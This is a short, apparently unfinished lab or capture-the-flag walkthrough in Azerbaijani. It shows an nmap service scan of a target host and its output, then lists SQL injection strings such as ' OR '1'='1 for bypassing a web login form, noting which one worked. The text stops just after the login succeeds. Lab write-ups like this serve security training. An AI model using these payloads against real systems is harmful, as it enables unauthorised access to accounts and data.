open vpn-e bagandikdan sonra masini baslatiriq ve ip-adresini kopyalayiriq daha sonra nmapda tarama edirik .
nmap -sC -sV 10.129.238.168
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-26 15:33 +04
Nmap scan report for 10.129.238.168
Host is up (1.9s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Login
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.25 seconds
burada 80/tcp portunun aciq oldugunu goruruk . anlaya bilirik bu ip uzerinde sayt var.
BASIT BIR LOGIN PAGE SEYFESI QARSIMIZA CIXIR. 2 YOLLA ETMEK OLAR
1 ci yol - indi her hansi bir giris melumatimiz olmadigina gore sql injection ile giris etmeye calisiriq . bunun uzerine usrernameye asagidakini yaza bilerik
' OR 1=1 -- veya # bezen ise ' OR '1'='1 -- veya ' OR '1'='1 # yaza bilerik bu password hissesini sistemin yorum olaraq qebul etmesine getirir .
2 ci yol usernameye her hansi bir sey yazib passworda asagidakini yazariq
' OR 1=1 veya ' OR 1=1 bu olmadiqda ' OR '1'='1 veya ' OR '1'='1
sinadiqdan sonra 2 ci yol ise yaradi . ' OR 1=1 yaramasada ' OR '1'='1 ise yaradi
VE giris ettikden sonra ;
